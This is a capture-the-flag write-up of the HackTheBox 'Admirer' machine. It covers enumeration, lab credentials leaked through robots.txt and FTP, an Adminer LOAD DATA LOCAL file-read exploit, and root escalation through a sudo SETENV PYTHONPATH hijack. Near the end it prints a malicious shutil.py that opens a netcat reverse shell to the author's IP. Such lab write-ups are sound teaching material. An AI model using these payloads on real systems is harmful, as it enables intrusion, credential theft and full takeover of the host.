Fourth box and counting. Once again, an interesting machine with an interesting story. Admirer taught me more about enumeration and how to identify exploitable CVEs, but the real lesson here was about falling into traps, following red herrings, and knowing that there is always more to the story, even when you think there is not.

Admirer - Technical Details

| OS: | Linux |
| Difficulty: | Easy |
| Points: | 20 |
| Release: | 02 May 2020 |
| IP: | 10.10.10.187 |

Synopsis

Admirer is an easy-rated Linux machine featuring a simple web application. Initial enumeration retrieves some red herrings along with a valid FTP username and password. The FTP server holds valuable information about the structure of the website and leads to an open-source, full-featured database management tool running an older version with a known CVE. Exploiting it reveals the SSH user and password. A sudo rule that lets the user set environment variables for a script, combined with a Python import resolved through the module search path, leads to full system compromise.

Key techniques and exploits:

- Enumeration

- CVE

- Sudo Abuse (SETENV)

- Python Library Hijacking

Enumeration

Starting with the classic Nmap, I got the complete mapping of the available services.

znq@sydney:~$ nmap -sV -p- 10.10.10.187

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-13 00:30 EEST

Nmap scan report for 10.10.10.187

Host is up (0.11s latency).

Not shown: 65532 closed ports

PORT STATE SERVICE VERSION

21/tcp open ftp vsftpd 3.0.3

22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)

80/tcp open http Apache httpd 2.4.25 ((Debian))

Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 2144.97 seconds

This box has 3 services running:

- FTP server (vsftpd 3.0.3) on port 21

- SSH server (OpenSSH 7.4p1) on port 22

- Apache web server (httpd 2.4.25) on port 80
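For repeatable note-taking, the service lines of the scan can be turned into structured data. The following is a minimal sketch, assuming the plain-text output format shown above; the function name parse_open_services is my own and not part of Nmap.

```python
import re

# Matches service lines such as "21/tcp open ftp vsftpd 3.0.3".
SERVICE_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")


def parse_open_services(nmap_output: str) -> list[tuple[int, str, str]]:
    """Return (port, service, version) for every open port in the output."""
    services = []
    for line in nmap_output.splitlines():
        match = SERVICE_LINE.match(line.strip())
        if match:
            port, _proto, service, version = match.groups()
            services.append((int(port), service, version.strip()))
    return services


# The three service lines from the scan above.
SCAN = """\
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
80/tcp open http Apache httpd 2.4.25 ((Debian))
"""

for port, service, version in parse_open_services(SCAN):
    print(port, service, version)
```

Nmap can also emit XML with -oX, which is more robust to parse than free text; the regular expression here is only a convenience for output that has already been pasted into notes.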

Focusing on the website available on port 80 for the moment, I inspected the functionalities in plain sight. Unfortunately, there was nothing more to it.

I continued to enumerate possible attack vectors using multiple tools simultaneously. gobuster is a powerful command-line alternative to dirbuster, brute-forcing URLs with a given wordlist. nikto, on the other hand, is a vulnerability scanner for websites, detecting common misconfigurations and problems.

znq@sydney:~$ gobuster dir -u http://10.10.10.187/ -w /usr/share/wordlists/dirb/common.txt

===============================================================

Gobuster v3.0.1

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)

===============================================================

[+] Url: http://10.10.10.187/

[+] Threads: 10

[+] Wordlist: /usr/share/wordlists/dirb/common.txt

[+] Status codes: 200,204,301,302,307,401,403

[+] User Agent: gobuster/3.0.1

[+] Timeout: 10s

===============================================================

2020/09/13 00:34:49 Starting gobuster

===============================================================

/.hta (Status: 403)

/.htaccess (Status: 403)

/.htpasswd (Status: 403)

/assets (Status: 301)

/images (Status: 301)

/index.php (Status: 200)

/robots.txt (Status: 200)

/server-status (Status: 403)

===============================================================

2020/09/13 00:35:43 Finished

===============================================================

znq@sydney:~$ nikto -host 10.10.10.187

- Nikto v2.1.6

---------------------------------------------------------------------------

+ Target IP: 10.10.10.187

+ Target Hostname: 10.10.10.187

+ Target Port: 80

+ Start Time: 2020-09-13 00:46:09 (GMT3)

---------------------------------------------------------------------------

+ Server: Apache/2.4.25 (Debian)

+ The anti-clickjacking X-Frame-Options header is not present.

+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS

+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type

+ No CGI Directories found (use '-C all' to force check all possible dirs)

+ "robots.txt" contains 1 entry which should be manually viewed.

+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.

+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.

+ OSVDB-3233: /icons/README: Apache default file found.

+ 7866 requests: 0 error(s) and 7 item(s) reported on remote host

+ End Time: 2020-09-13 01:02:45 (GMT3) (996 seconds)

---------------------------------------------------------------------------

+ 1 host(s) tested

Both tools pointed to a robots.txt file. robots.txt is a text file that tells web robots (most often search engines) which pages on a site they may crawl and which they should skip. Usually, there shouldn't be any sensitive information stored here, as this file is also readable by humans. In this case, it did contain sensitive information.

User-agent: *

# This folder contains personal contacts and creds, so no one -not even robots- should see it - waldo

Disallow: /admin-dir
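Pulling the Disallow entries out of a robots.txt file is easy to script. This is a small sketch, assuming the simple "Field: value" layout shown above; disallowed_paths is a name I made up for illustration.

```python
def disallowed_paths(robots_txt: str) -> list[str]:
    """Return every non-empty path listed in a Disallow directive."""
    paths = []
    for raw in robots_txt.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and whitespace
        if line.lower().startswith("disallow:"):
            path = line.split(":", 1)[1].strip()
            if path:
                paths.append(path)
    return paths


# The robots.txt content shown above.
ROBOTS = """\
User-agent: *
# This folder contains personal contacts and creds, so no one -not even robots- should see it - waldo
Disallow: /admin-dir
"""

print(disallowed_paths(ROBOTS))
```

Note that the comment line is discarded by the parser, so the most interesting hint in this particular file still has to be read by a human.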

The robots.txt file pointed to an /admin-dir directory. Unfortunately, directory listing was turned off and I got a 403 Forbidden error when I tried to access it. Without getting discouraged, I continued to enumerate, this time specifically inside this directory and for text files (as the comment in robots.txt suggested, there should be some files with personal contacts and credentials).

Using wfuzz for this purpose, I got 2 hits. It is worth noting that I used the big.txt wordlist here. My first attempts, with small.txt and common.txt, both returned only the first file (contacts.txt).

znq@sydney:~$ wfuzz -c -z file,/usr/share/wordlists/dirb/big.txt --hc 404 http://10.10.10.187/admin-dir/FUZZ.txt

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************

* Wfuzz 2.4.5 - The Web Fuzzer *

********************************************************

Target: http://10.10.10.187/admin-dir/FUZZ.txt

Total requests: 20469

===================================================================

ID Response Lines Word Chars Payload

===================================================================

000000015: 403 9 L 28 W 277 Ch ".htaccess"

000000016: 403 9 L 28 W 277 Ch ".htpasswd"

000005198: 200 29 L 39 W 350 Ch "contacts"

000005443: 200 11 L 13 W 136 Ch "credentials"

Total time: 245.5679

Processed Requests: 20469

Filtered Requests: 20465

Requests/sec.: 83.35369
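The idea behind the wfuzz run can be sketched in a few lines of Python: substitute each word for the FUZZ marker, request the URL, and hide the 404 responses. This is only an illustration under my own assumptions (sequential requests, the helper names http_status and fuzz, a stubbed demo), not a replacement for the real tool.

```python
from typing import Callable, Iterable, Iterator
from urllib.error import HTTPError
from urllib.request import urlopen


def http_status(url: str, timeout: float = 10.0) -> int:
    """Return the HTTP status code for url, or 0 if the request fails outright."""
    try:
        with urlopen(url, timeout=timeout) as response:
            return response.status
    except HTTPError as err:  # 4xx/5xx responses still carry a status code
        return err.code
    except OSError:           # DNS failure, refused connection, timeout
        return 0


def fuzz(template: str, words: Iterable[str],
         probe: Callable[[str], int] = http_status,
         hide: frozenset = frozenset({404})) -> Iterator[tuple[str, int]]:
    """Yield (word, status) for every word whose response is not hidden."""
    for word in words:
        status = probe(template.replace("FUZZ", word))
        if status and status not in hide:
            yield word, status


# Offline demonstration with a stub probe (hypothetical responses, no network).
stub = {"http://target/admin-dir/contacts.txt": 200}
print(list(fuzz("http://target/admin-dir/FUZZ.txt", ["backup", "contacts"],
                probe=lambda url: stub.get(url, 404))))
```

Against a real target, the words would come from a wordlist file such as big.txt and the default probe would be used. As the run above shows, the choice of wordlist matters more than the tool.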

The files had the following contents:

##########

# admins #

##########

# Penny

Email: [email protected]

##############

# developers #

##############

# Rajesh

Email: [email protected]

# Amy

Email: [email protected]

# Leonard

Email: [email protected]

#############

# designers #

#############

# Howard

Email: [email protected]

# Bernadette

Email: [email protected]

[Internal mail account]

[email protected]

fgJr6q#S\W:$P

[FTP account]

ftpuser

%n?4Wz}R$tTF7

[Wordpress account]

admin

w0rdpr3ss01!

FTP Access

These provided a lot of information, but not everything was useful. At this point, the only viable set of credentials was the one for the FTP account. Logging in, I found another 2 files: dump.sql and html.tar.gz.

znq@sydney:~$ ftp 10.10.10.187

Connected to 10.10.10.187.

220 (vsFTPd 3.0.3)

Name (10.10.10.187:znq): ftpuser

331 Please specify the password.

Password:

230 Login successful.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> ls

200 PORT command successful. Consider using PASV.

150 Here comes the directory listing.

-rw-r--r-- 1 0 0 3405 Dec 02 2019 dump.sql

-rw-r--r-- 1 0 0 5270987 Dec 03 2019 html.tar.gz

226 Directory send OK.

ftp> get dump.sql

local: dump.sql remote: dump.sql

200 PORT command successful. Consider using PASV.

150 Opening BINARY mode data connection for dump.sql (3405 bytes).

226 Transfer complete.

3405 bytes received in 0.01 secs (323.5255 kB/s)

ftp> get html.tar.gz

local: html.tar.gz remote: html.tar.gz

200 PORT command successful. Consider using PASV.

150 Opening BINARY mode data connection for html.tar.gz (5270987 bytes).

226 Transfer complete.

5270987 bytes received in 6.92 secs (744.1630 kB/s)
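The same download can be scripted with Python's standard ftplib module. This is a sketch rather than what I ran at the time: download_all and fetch_from_target are hypothetical helper names, and the files are held in memory, which is fine for a 3 KB dump and a 5 MB archive.

```python
from ftplib import FTP


def download_all(ftp) -> dict[str, bytes]:
    """Fetch every entry in the current FTP directory into memory."""
    files = {}
    for name in ftp.nlst():
        chunks = []
        # retrbinary calls the callback once per received block.
        ftp.retrbinary(f"RETR {name}", chunks.append)
        files[name] = b"".join(chunks)
    return files


def fetch_from_target(host: str, user: str, password: str) -> dict[str, bytes]:
    """Log in and download the directory listing (performs network I/O)."""
    with FTP(host, timeout=30) as ftp:
        ftp.login(user=user, passwd=password)
        return download_all(ftp)
```

Calling fetch_from_target("10.10.10.187", "ftpuser", password) with the password from credentials.txt should return the two files listed above. The sketch assumes the listing contains only regular files, since RETR on a directory would fail.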

Dumping the contents of the SQL file got me nothing more than the list of images with their respective descriptions from the main page of the website.

However, the tar archive was more useful. It contained a backup of the web server.

.

├── assets

│ └── <truncated>

├── dump.sql

├── html.tar.gz

├── images

│ ├── fulls

│ │ ├── <truncated>

│ └── thumbs

│ ├── <truncated>

├── index.php

├── robots.txt

├── utility-scripts

│ ├── admin_tasks.php

│ ├── db_admin.php

│ ├── info.php

│ └── phptest.php

└── w4ld0s_s3cr3t_d1r

├── contacts.txt

└── credentials.txt

15 directories, 84 files

Here, instead of /admin-dir, I had /w4ld0s_s3cr3t_d1r (the only difference in these files was the addition of another set of credentials - for a bank account).

[Bank Account]

waldo.11

Ezy]m27}OREc$

Next, the source code of index.php and /utility-scripts/db_admin.php revealed two more sets of credentials, which proved to be red herrings again.

index.php

<truncated>

$servername = "localhost";

$username = "waldo";

$password = "]F7jLHw:*G>UPrTo}~A"d6b";

$dbname = "admirerdb";

// Create connection

$conn = new mysqli($servername, $username, $password, $dbname);

// Check connection

if ($conn->connect_error) {

die("Connection failed: " . $conn->connect_error);

}

<truncated>

/utility-scripts/db_admin.php

<?php

$servername = "localhost";

$username = "waldo";

$password = "Wh3r3_1s_w4ld0?";

// Create connection

$conn = new mysqli($servername, $username, $password);

// Check connection

if ($conn->connect_error) {

die("Connection failed: " . $conn->connect_error);

}

echo "Connected successfully";

// TODO: Finish implementing this or find a better open source alternative

?>

Two more files left there to mislead were info.php, which printed the phpinfo() output, and phptest.php, which printed "Just a test to see if PHP works."



Finally, the last file with potential, /utility-scripts/admin_tasks.php.

<html>

<head>

<title>Administrative Tasks</title>

</head>

<body>

<h3>Admin Tasks Web Interface (v0.01 beta)</h3>

<?php

// Web Interface to the admin_tasks script

//

if(isset($_REQUEST['task']))

{

$task = $_REQUEST['task'];

if($task == '1' || $task == '2' || $task == '3' || $task == '4' ||

$task == '5' || $task == '6' || $task == '7')

{

/***********************************************************************************

Available options:

1) View system uptime

2) View logged in users

3) View crontab (current user only)

4) Backup passwd file (not working)

5) Backup shadow file (not working)

6) Backup web data (not working)

7) Backup database (not working)

NOTE: Options 4-7 are currently NOT working because they need root privileges.

I'm leaving them in the valid tasks in case I figure out a way

to securely run code as root from a PHP page.

************************************************************************************/

echo str_replace("\n", "<br />", shell_exec("/opt/scripts/admin_tasks.sh $task 2>&1"));

}

else

{

echo("Invalid task.");

}

}

?>

<p>

<h4>Select task:</p>

<form method="POST">

<select name="task">

<option value=1>View system uptime</option>

<option value=2>View logged in users</option>

<option value=3>View crontab</option>

<option value=4 disabled>Backup passwd file</option>

<option value=5 disabled>Backup shadow file</option>

<option value=6 disabled>Backup web data</option>

<option value=7 disabled>Backup database</option>

</select>

<input type="submit">

</form>

</body>

</html>

Since this looked like an older backup of the website, I suspected that these files might still be available on the live server. And I was right. Navigating to http://10.10.10.187/utility-scripts/admin_tasks.php got the following page:

Only the first 3 options were usable, as stated in the source code. Re-enabling the other 4 (marked as disabled in the HTML form) resulted in a privilege error, as expected. This seemed like another dead end. I did try some PHP type juggling tricks to execute arbitrary commands along with the shell script, but to no avail.



Adminer - Database Management CVE

I got stuck for a while here, trying all the passwords found so far with all the users against every service available, but all were red-herrings. One thing that I overlooked was a comment in /utility-scripts/db_admin.php.

// TODO: Finish implementing this or find a better open source alternative



I searched on Google for "open source alternative" together with the name of the box, and there it was, right in front of me: an open source database management tool called Adminer. I tried to access http://10.10.10.187/utility-scripts/adminer.php and was greeted with a login page.

Again, I tried every username and password combination from the multitude I had so far, but none worked. Then, I noticed the version of the application in the top left corner (4.6.2), and next to it, in red, another one (4.7.7). It suggested that this one was not the latest one. I immediately thought of looking for CVEs, and I was right to do so. Older versions of Adminer have a vulnerability which might enable potentially malicious actors to steal credentials and other sensitive data from the server hosting it.

The exploit works by letting an attacker connect to a remote database through the Adminer interface on the target server and abuse the LOAD DATA LOCAL command to read the contents of files stored on that server. There are 3 steps in this attack:

- Create a local database on your machine. Make it accessible to the target. Connect with your credentials to the local database using the target interface.

- Use the command LOAD DATA LOCAL to load a file from the target server into a table in your local database.

- Connect to the target database using the credentials you just stole.
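The second step boils down to a handful of SQL statements run against the attacker-controlled database. The sketch below only builds those statements as strings. The table name extracted matches the payload used later in this write-up, while the column name line and the helper build_exfil_statements are assumptions of mine.

```python
LOAD_TEMPLATE = (
    "LOAD DATA LOCAL INFILE '{path}' INTO TABLE {table} "
    "FIELDS TERMINATED BY \"\\n\""
)


def build_exfil_statements(remote_path: str, table: str = "extracted") -> list[str]:
    """Return the SQL to create a table, load a file into it, and read it back."""
    if not table.isidentifier():
        raise ValueError("table name must be a plain identifier")
    # Escape backslashes and single quotes for the SQL string literal.
    escaped = remote_path.replace("\\", "\\\\").replace("'", "\\'")
    return [
        f"CREATE TABLE IF NOT EXISTS {table} (line TEXT)",  # 'line' is hypothetical
        LOAD_TEMPLATE.format(path=escaped, table=table),
        f"SELECT line FROM {table}",
    ]


for statement in build_exfil_statements("../index.php"):
    print(statement + ";")
```

The important detail is the LOCAL keyword: the file is read on the client side of the MySQL connection, and in this attack the client is Adminer running on the target.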

More information on this vulnerability and a demo can be found on the Foregenix website.

In this case, I created a Docker container with a MySQL server image and forwarded port 3306 in order to access it from the target interface.

znq@sydney:~$ sudo docker pull mysql/mysql-server:5.7

5.7: Pulling from mysql/mysql-server

e945e9180309: Already exists

bda404c4d2e2: Pull complete

858855003112: Pull complete

d92ed785684c: Pull complete

Digest: sha256:6d6fdd5bd31256a484e887c96c41abfc9ee3e3deb989de83ebdb8694fcc83485

Status: Downloaded newer image for mysql/mysql-server:5.7

docker.io/mysql/mysql-server:5.7

znq@sydney:~$ sudo docker run --name=rogue-mysql -e MYSQL_ROOT_HOST=% -e MYSQL_ROOT_PASSWORD=pass -p 3306:3306 -d mysql/mysql-server:5.7

2135d8a489d1e65bef2b2f7c491812c641d542be7b1d211ed21814242b146f48

znq@sydney:~$ sudo docker ps -a

CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES

2135d8a489d1 mysql/mysql-server:5.7 "/entrypoint.sh mysq…" 7 seconds ago Up 5 seconds (health: starting) 0.0.0.0:3306->3306/tcp, 33060/tcp rogue-mysql

Next, I connected using the interface with my own details and executed the following payload:

load data local infile '../index.php'

into table extracted

fields terminated by "\n"



I did some guessing at first in order to find some useful information, but there was a small defense mechanism in place that did not allow me to go more than one folder back in the path (../). Then I remembered the backup downloaded from the FTP server and its structure. index.php was just one directory back and contained a brand new set of credentials.

<truncated>

$username = "waldo";

$password = "&<h5b~yK3F#{PaPB&dA}{H>";

<truncated>
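Once the file sits in a table as one row per line, the interesting assignments can be filtered out automatically. The following is a rough sketch, assuming simple double-quoted PHP string assignments on a single line; php_string_assignments is a hypothetical helper and not a real PHP parser.

```python
import re

# Matches lines such as:  $username = "waldo";
ASSIGNMENT = re.compile(r'^\s*\$(\w+)\s*=\s*"(.*)";\s*$')


def php_string_assignments(lines: list[str]) -> dict[str, str]:
    """Map variable names to the string literals assigned to them."""
    found = {}
    for line in lines:
        match = ASSIGNMENT.match(line)
        if match:
            found[match.group(1)] = match.group(2)
    return found


# The two lines recovered from index.php, as shown above.
rows = [
    '$username = "waldo";',
    '$password = "&<h5b~yK3F#{PaPB&dA}{H>";',
]
print(php_string_assignments(rows))
```

The greedy match up to the final "; means a password that itself contains a double quote is still captured whole.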

With these credentials I logged into the actual database on the target machine. Unfortunately, it was a new dead end. The tables only had the information I already got from the dump.sql.

Initial Foothold - SSH Access

New hope arose when I remembered the SSH service, which I had not used yet. Trying it with the user waldo and the password above was successful.

znq@sydney:~/admirer$ ssh waldo@10.10.10.187

waldo@10.10.10.187's password:

Linux admirer 4.9.0-12-amd64 x86_64 GNU/Linux

The programs included with the Devuan GNU/Linux system are free software;

the exact distribution terms for each program are described in the

individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent

permitted by applicable law.

You have new mail.

Last login: Sun Sep 13 17:44:11 2020 from 10.10.15.71

waldo@admirer:~$ cat user.txt

640xxxxxxxxxxxxxxxxxxxxxxxxxxxe2

After spending a lot of time chasing false leads, I finally had a foothold on the machine. From here on, things got a little easier.

Privilege Escalation

First things first, I checked for SUID binaries and whether the user has any sudo rights.

waldo@admirer:/opt/scripts$ find / -user root -perm -4000 -print 2>/dev/null

/bin/su

/bin/mount

/bin/umount

/bin/fusermount

/bin/ping

/usr/lib/policykit-1/polkit-agent-helper-1

/usr/lib/openssh/ssh-keysign

/usr/lib/dbus-1.0/dbus-daemon-launch-helper

/usr/lib/eject/dmcrypt-get-device

/usr/sbin/exim4

/usr/bin/chfn

/usr/bin/pkexec

/usr/bin/newgrp

/usr/bin/passwd

/usr/bin/chsh

/usr/bin/gpasswd

/usr/bin/sudo
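The find invocation above can be approximated in Python with os.walk and the stat module. This is a sketch under my own naming (has_suid_bit, find_suid). Unlike find, it only looks at non-directory entries.

```python
import os
import stat
from typing import Iterator


def has_suid_bit(mode: int) -> bool:
    """True if the set-user-ID bit (octal 4000) is set in a file mode."""
    return bool(mode & stat.S_ISUID)


def find_suid(root: str = "/", owner_uid: int = 0) -> Iterator[str]:
    """Yield files under root that are owned by owner_uid and have the SUID bit."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                info = os.lstat(path)  # like find, do not follow symlinks
            except OSError:
                continue  # unreadable or vanished entry, same effect as 2>/dev/null
            if info.st_uid == owner_uid and has_suid_bit(info.st_mode):
                yield path
```

Running list(find_suid("/")) on the target should produce a list comparable to the one above, although walking the whole filesystem in Python is noticeably slower than find.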

waldo@admirer:/home$ sudo -l

[sudo] password for waldo:

Matching Defaults entries for waldo on admirer:

env_reset, env_file=/etc/sudoenv, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always

User waldo may run the following commands on admirer:

(ALL) SETENV: /opt/scripts/admin_tasks.sh

The first command was not useful, as there were no interesting binaries, just the usual ones. However, the second one showed that the user waldo can execute the shell script located at /opt/scripts/admin_tasks.sh with elevated privileges. The SETENV tag on that rule means that environment variables may be set when invoking the script through sudo. I already knew about the script's existence from the source code of /utility-scripts/admin_tasks.php, but this was the proof that it would be of use in my later attempts.
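In sudoers, the SETENV tag lets the caller set or preserve environment variables for that command despite env_reset, so it is worth flagging whenever it shows up. The sketch below parses the rule lines of sudo -l output. The regular expression and the name parse_sudo_rules are my own and only cover the simple "(runas) TAG: command" form seen here.

```python
import re

# Matches rule lines such as "(ALL) SETENV: /opt/scripts/admin_tasks.sh".
RULE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<command>.+)$"
)


def parse_sudo_rules(sudo_l_output: str) -> list[dict]:
    """Return the run-as user, tags and command for each rule line."""
    rules = []
    for line in sudo_l_output.splitlines():
        match = RULE.match(line)
        if match:
            tags = [t.strip() for t in match.group("tags").split(":") if t.strip()]
            rules.append({
                "runas": match.group("runas"),
                "tags": tags,
                "command": match.group("command").strip(),
            })
    return rules


OUTPUT = """\
User waldo may run the following commands on admirer:
    (ALL) SETENV: /opt/scripts/admin_tasks.sh
"""

for rule in parse_sudo_rules(OUTPUT):
    if "SETENV" in rule["tags"]:
        print("environment can be set for:", rule["command"])
```

Any rule carrying SETENV deserves a second look at what the command executes, because variables such as PYTHONPATH or LD_PRELOAD may then reach code running as root.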

waldo@admirer:/opt/scripts$ ls -al

total 16

drwxr-xr-x 2 root admins 4096 Dec 2 2019 .

drwxr-xr-x 3 root root 4096 Nov 30 2019 ..

-rwxr-xr-x 1 root admins 2613 Dec 2 2019 admin_tasks.sh

-rwxr----- 1 root admins 198 Dec 2 2019 backup.py

I also noticed another script in the same directory, this time a Python one. Inspecting the contents of both scripts, I found some interesting things.

admin_tasks.sh

#!/bin/bash

view_uptime()

{

/usr/bin/uptime -p

}

view_users()

{

/usr/bin/w

}

view_crontab()

{

/usr/bin/crontab -l

}

backup_passwd()

{

if [ "$EUID" -eq 0 ]

then

echo "Backing up /etc/passwd to /var/backups/passwd.bak..."

/bin/cp /etc/passwd /var/backups/passwd.bak

/bin/chown root:root /var/backups/passwd.bak

/bin/chmod 600 /var/backups/passwd.bak

echo "Done."

else

echo "Insufficient privileges to perform the selected operation."

fi

}

backup_shadow()

{

if [ "$EUID" -eq 0 ]

then

echo "Backing up /etc/shadow to /var/backups/shadow.bak..."

/bin/cp /etc/shadow /var/backups/shadow.bak

/bin/chown root:shadow /var/backups/shadow.bak

/bin/chmod 600 /var/backups/shadow.bak

echo "Done."

else

echo "Insufficient privileges to perform the selected operation."

fi

}

backup_web()

{

if [ "$EUID" -eq 0 ]

then

echo "Running backup script in the background, it might take a while..."

/opt/scripts/backup.py &

else

echo "Insufficient privileges to perform the selected operation."

fi

}

backup_db()

{

if [ "$EUID" -eq 0 ]

then

echo "Running mysqldump in the background, it may take a while..."

#/usr/bin/mysqldump -u root admirerdb > /srv/ftp/dump.sql &

/usr/bin/mysqldump -u root admirerdb > /var/backups/dump.sql &

else

echo "Insufficient privileges to perform the selected operation."

fi

}

<truncated>

backup.py

#!/usr/bin/python3

from shutil import make_archive

src = '/var/www/html/'

# old ftp directory, not used anymore

#dst = '/srv/ftp/html'

dst = '/var/backups/html'

make_archive(dst, 'gztar', src)

The shell script uses absolute paths for all the external calls made, even for the python script. This means that I cannot hijack any paths from there, like I did in the Magic box in my previous article.

Python Library Hijacking

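However, the Python script imports a function (make_archive) from a library (shutil) by name, and Python resolves that name by searching the directories on its module search path. Because the sudo rule allows environment variables to be set (SETENV), I can put a directory of my choosing at the front of that search path via PYTHONPATH and supply my own shutil module with a make_archive function.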
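The shadowing effect is easy to reproduce safely on your own machine. The following sketch writes a harmless fake shutil.py into a temporary directory and starts a child interpreter with PYTHONPATH pointing at it. The function name demo_shadowing and the returned marker string are assumptions for illustration, and no shell is spawned.

```python
import os
import subprocess
import sys
import tempfile
from pathlib import Path

# Harmless stand-in for the malicious module: same function name and arity.
FAKE_SHUTIL = '''\
def make_archive(base_name, format, root_dir):
    return "hijacked"
'''

CHILD_CODE = (
    "from shutil import make_archive; "
    "print(make_archive('dst', 'gztar', 'src'))"
)


def demo_shadowing() -> str:
    """Run a child Python whose 'shutil' import resolves to the fake module."""
    with tempfile.TemporaryDirectory() as tmp:
        Path(tmp, "shutil.py").write_text(FAKE_SHUTIL)
        # PYTHONPATH entries are searched before the standard library.
        env = dict(os.environ, PYTHONPATH=tmp)
        result = subprocess.run(
            [sys.executable, "-c", CHILD_CODE],
            env=env, capture_output=True, text=True, check=True,
        )
        return result.stdout.strip()


print(demo_shadowing())
```

This works because shutil is an ordinary module located through sys.path at import time. Modules that are built into or frozen into the interpreter cannot be replaced this way.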

Note that trying to run the Python script by itself didn't work, because it needed root permissions and was not covered by the sudo rule. However, being called from within the shell script meant it would run with the same privileges, and the same environment, as its parent.

Next, I created my own python script called shutil.py (the same name as the library), which had only one function called make_archive with 3 parameters, in order to match the function signature in the original context. The content of the function was a simple netcat call targeting my HTB VPN IP on port 4444, running /bin/sh.

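import os

# Stand-in for shutil.make_archive(dst, 'gztar', src): same name, three positional arguments.

def make_archive(a, b, c):

    # Connect back to the listener and hand it a shell.

    os.system("nc 10.10.14.177 4444 -e /bin/sh")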

I then ran the admin_tasks.sh script, making sure to change the path from which python takes its libraries (PYTHONPATH variable) to the directory where my custom script was (/home/waldo/python/). Further reading on this can be found in this Medium article.

waldo@admirer:~/python$ sudo PYTHONPATH=/home/waldo/python/ /opt/scripts/admin_tasks.sh 6

Running backup script in the background, it might take a while...

Before running it, I had started a netcat listener on my workstation on the same port, and it received a connection from the target machine as root. The system was now fully compromised.

znq@sydney:~$ nc -lnvp 4444

listening on [any] 4444 ...

connect to [10.10.14.177] from (UNKNOWN) [10.10.10.187] 42966

python3 -c 'import pty; pty.spawn("/bin/bash")'

root@admirer:/home/waldo/python# whoami

whoami

root

root@admirer:/home/waldo/python# cd /root

cd /root

root@admirer:~# ls

ls

root.txt

root@admirer:~# cat root.txt

cat root.txt

74exxxxxxxxxxxxxxxxxxxxxxxxxxx61

root@admirer:~#

Pwned